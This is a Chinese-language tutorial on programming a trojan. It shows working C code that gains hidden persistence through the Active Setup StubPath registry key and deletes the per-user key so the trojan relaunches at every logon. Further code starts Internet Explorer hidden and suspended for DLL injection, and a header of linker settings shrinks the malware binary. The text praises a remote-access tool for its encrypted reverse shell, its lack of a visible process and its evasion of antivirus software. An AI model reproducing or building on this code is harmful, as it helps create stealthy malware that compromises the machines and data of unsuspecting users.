编程实现木马的ActiveX启动和注入IE的启动方式

木马的启动方式有很多种，现在比较流行的就是注册为系统服务启动（只适合Windows 2000以上的系统），或者以驱动的方式启动。不过，最近以ActiveX方式启动又比较流行了,因为它适合Windows 9x或2000以上的机器，而且杀毒软件（比如瑞星、江民、金山等）基本不会去监视这种启动方式，比较隐蔽。以ActiveX方式启动的木马国外的比较多，于是就到网上查找相关代码，发现了RECUB。  

　　其实RECUB是一个Windows平台的远程管理工具，其源代码已经为我们写的很清楚了，下面简要介绍一下RECUB。它能对Windows XP/2000/2003的反向连接Shell进行RC4加密；可以作为IE浏览器的实例启动并注入代码来绕过防火墙；通过加密的ICMP请求来激活；没有监听端口；没有可见进程，以注入Explorer.exe的方式启动和退出；可以通过ActiveX启动；退出Shell的时候没有事件日志；可以使用 nc得到远程Shell；EXE文件只有5.39K大小。怎么样，挺强的吧？下面我们就看一下它的部分代码，具体如下：  

//Active启动原理与代码  
　　//初始化定义主键值  
　　char regkey[MAX_PATH];  
　　//定义服务端当前路径  
　　char pathexe[MAX_PATH];  
　　//子键的定义与初始化  
　　HKEY childkey = 0 ;  
　　//获取我们运行的服务端的当前路径  
　　GetModuleFileName(NULL,pathexe,MAX_PATH);  
　　//注册主键  
wsprintf(regkey,"%s%s","Software\\Microsoft\\Active Setup\\Installed Components\\",REGKEY);  
　　//删除HKEY_CURRENT_USER相关的启动信息，这是ActiveX启动的关键  
　　RegDeleteKey(HKEY_CURRENT_USER, ( LPCTSTR )regkey);  
　　//创建AxtiveX启动信息，注册HKEY_LOCAL_MACHINE  
　　RegCreateKey(HKEY_LOCAL_MACHINE, ( LPCTSTR )regkey, &childkey );  
　　//把我们获取到的当前的路径复制给主键  
RegSetValueEx (childkey, ( LPCTSTR )"StubPath" ,0, REG_SZ, ( const BYTE* ) ( LPCTSTR )pathexe,lstrlen(pathexe)) ;  
　　//关闭HKEY的对象  
　　RegCloseKey (childkey);  
　　  
　　从以上的代码我们可以清晰地看到，ActiveX启动其实非常简单，仅仅是在HKEY_LOCAL_MACHINE下的Software\\ Microsoft\\Active Setup\\Installed Components\\中注册一条信息就可以了。这条信息的键类似{36f8ec70-c29a-11d1-b5c7-0000f8051515}就可以。其实，我们可以随便的更改这些数字，只要不重复就可以了，而且我们还可以在这个键的下面新增一些子键和值（我们服务端的绝对地址）。  
在上面的代码中有一个关键代码RegDeleteKey(HKEY_CURRENT_USER, ( LPCTSTR )regkey)，其作用是每次启动的时候清理HKEY_CURRENT_USER里面的信息。因为每当我们启动服务端的时候，系统都会自动在 HKEY_CURRENT_USER中注册一些HKEY_LOCAL_MACHINE中的信息，我们必须在程序中删除这些，否则我们的服务端也只能有一次的自启动机会。  
　　根据上面的介绍，这里我就简单的写一段测试代码以供大家参考。启动VC，新建一个工程名称为test的Win32 Application，默认为一个简单的Win32程序，并假定我们的服务端是在系统目录system32中的exloroe.exe。其代码如下：
#include "stdafx.h"  
int APIENTRY WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow)  
{  
// TODO: Place code here.  
HKEY hKey;  
TCHAR svExeFile[256] = "%SystemRoot%\\system32\\exloroe.exe";  
RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}",&hKey);  
RegSetValue(hKey,NULL,REG_SZ,"系统设置",strlen("系统设置"));  
RegSetValueEx(hKey,"stubpath",0,REG_EXPAND_SZ,(BYTE *)svExeFile,lstrlen(svExeFile));  
RegCloseKey(hKey);  
return 0;  
}  
　　这个最简单的程序就实现了在HKEY_LOCAL_MACHINE中注册ActiveX的过程。在程序退出的时候，我们可以编写下面的代码来清除HKEY_CURRENT_USER中的相关信息，以达到我们的程序启动的目的。  
　　  
CreateThread(NULL,NULL,del,NULL,NULL,NULL); //ActiveX---  
DWORD WINAPI del(LPVOID lpParam)  
{  
RegDeleteKey(HKEY_CURRENT_USER,"Software\\Microsoft\\Active Setup\\Installed Components\\{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}");   
return TRUE;  
}  
下面我们再来看看DLL注入IE的木马的启动IE的方式。网上的开源代码很多，不过80%的注入文件都是explorer.exe，这个虽说比较简单，但很稳定。说它简单是因为它默认总是启动的，就不需要考虑它是否存在的问题。注入IE时，我们首先需要判断是否有iexplorer.exe的进程，如果没有，我们就需要找到iexplorer.exe所在的目录（一般都在C:\Program Files\Internet Explorer中，不过还是通过程序搜索最好，毕竟有好多网管把系统装在其他的盘符之中）。  
记得自己刚刚写DLL程序的时候，启动IE的方式使用下面的代码：  
WinExec("C:\\Program Files\\Internet Explorer\\iexplore.exe -nohome",SW_HIDE);  
　　也就是IE的空启动。用这种方法实现，虽然IE启动了，而且也挺隐蔽，但启动时就占用3000K的内存，这个是我们所不能接受的，我们希望程序启动能尽可能少的占用内存。后来在国外的一个站点上，我发现可以用下面的一种方法来启动，占用内存极小，其代码如下：  
//进程information  
　　PROCESS_INFORMATION pi = {0};  
　　//启动信息  
STARTUPINFO si = {0};   
//存储信息  
ZeroMemory(&si,sizeof(si));  
//信息的大小  
si.cb = sizeof(si);  
//相关信息  
si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;  
　　//隐藏启动  
si.wShowWindow = SW_HIDE;  
//隐藏  
pi.hProcess = SW_HIDE;  
//启动的主函数  
CreateProcess(   
NULL,   
//我们暂时就简单的默认IE在C:\\Program Files\\Internet Explorer\\iexplore.exe中  
"C:\\Program Files\\Internet Explorer\\iexplore.exe",   
NULL,   
NULL,   
0,   
CREATE_SUSPENDED,   
NULL,   
NULL,   
&si,   
π  
);  
最后我想说一下VC编译的优化处理问题。一是使用Release版而不用Debug版编译，因为使用Debug版编译会生成许多垃圾信息。使用 Release版编译的具体方法是在“build（编译）->Configuration（配置）”中，将“Win32 debug”移去，然后再次编译，就可以发现文件已经小了很多。二是设置自己的入口点函数。C或C++程序默认的入口函数是main()或WinMain ()，但我们现在不用Main和WinMain，因为这些都不是直接的入口点。编译器在产生exe文件的时候，将为我们生成真正的入口点。下面我们来定义自己的入口函数，具体方法是把main或WinMain改成其它的名字（如MyFun），打开“Project（工程）->settings（设置）”选项，选中“link”选项卡，在“Category（分类）”下拉列表中选“output”，在“Entry-Point symbol（输入项）”中输入我们刚才定义的入口函数（MyFun），在源程序中也要做相应修改。三是优化最小大小；四是输出，入口点改为MyDll （随便改啦）；五是连接，/align:40。  
　　有了这些，基本上就能把我们的程序的体积减少很多，但每次这样的去设置，在编程的时候会很不方便，我们干脆直接写一个头文件（my.h），直接调用就少了很多的麻烦。下面是my.h的代码。  
// Version 1.00  
　　// xgym  
　　// May 20th, 1999  
　　// [email]xgymcn@163.com[/email]  
　　#ifdef NDEBUG  
　　#pragma optimize("gsy",on)  
　　#pragma comment(linker,"/RELEASE")  
　　#ifdef _MERGE_RDATA_  
　　#pragma comment(linker,"/merge:.rdata=.data")  
　　#endif  
　　#pragma comment(linker,"/merge:.text=.data")  
　　#pragma comment(linker,"/merge:.reloc=.data")  
　　#if _MSC_VER >= 1000  
　　#endif  
　　#endif  
　　#pragma comment(linker,"/MERGE:.rdata=.data")  
　　#pragma comment(linker,"/MERGE:.text=.data")  
　　#pragma comment(lib,"msvcrt.lib")  
　　#if (_MSC_VER < 1300)   
　　 #pragma comment(linker,"/IGNORE:4078")   
　　 #pragma comment(linker,"/OPT:NOWIN98")  
　　#endif  
　　#define WIN32_LEAN_AND_MEAN  
　　  
　　有了这个头文件，我们在编写服务端的时候，为了减少体积，直接“#include "my.h"”就可以了，这样就少了很多的步骤，而效果却是一样的。